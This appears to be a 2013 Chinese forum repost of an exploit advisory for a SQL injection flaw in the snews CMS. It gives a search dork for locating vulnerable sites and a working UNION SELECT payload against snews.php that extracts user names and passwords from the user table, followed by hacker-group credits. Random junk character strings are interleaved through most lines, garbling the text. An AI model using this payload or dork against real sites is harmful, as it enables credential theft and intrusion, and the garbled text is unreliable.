标题: CMS snews SQL Injection Vulnerability
p/ C; Z/ s. H$ ]( Y+ U2 R8 A作者: By onestree h' g2 M; e4 a9 B7 D0 _
下载地址 : http://snewscms.com/
$ q6 S) e1 U6 Z: s测试平台 : ubuntu 12.10 / win 77 n$ ~: W6 Z" {, @/ m3 n
关键词: inurl:"tanyakan pada rumput yang bergoyang"0 W! e) f# D/ H. l. N
+ U/ |1 k1 m( o5 ~9 S9 {" n$ U
9 A( h0 `: I5 T; \% |2 {*************************************************************
; b" x! a3 y' |' \9 X
7 R& E2 X2 k5 P, _- \% WSQL poc:
; c, \3 F+ ^+ C1 Z9 P . ^) b7 T7 r5 l" U$ q& j/ t
http://www.2cto.com /snews/snews.php?act=shownews&id=[SQL]
* F5 ~/ q5 a' B" T8 t5 V$ J- x; h : E+ d+ H+ H7 B x' i. \6 H9 l
示例9 g' a* X! S- ?6 E( e' _
& C& L V9 T. i8 R8 P
http://localhost/snews/snews.php?act=shownews&id=-23/**/union/**/select/**/0,1,concat(user_name,char(32),user_pass),3,4,5,6/**/from/**/snews_user/**/where/**/id%20like%201/*
! j. [7 c9 P; R
' ~( f' \* M) h/ `, @
6 R4 S, {1 Q* t4 A致谢:) j+ M% y. H# ^0 S$ c0 r
c$ g, _: V$ L" Q( b3 V
Exploit-db | Alex_Ownz | alm.teardrop | abhelink | kalong666 | prorebell
* A0 c3 |. t2 l) v, {$ b . v, i; O8 ^2 I6 G9 a. `
indonesiancoder - moeslimh4x0r - go-coder
/ Z! n! \" i. Q: S3 D" c0 }
3 n' R' {7 u) g2 f. Z# q8 Z7 cspesial my hunny :* Z. P3 g! |/ ^: G) A5 O
|
发表于 2013-1-23 08:55:06
收藏
支持
反对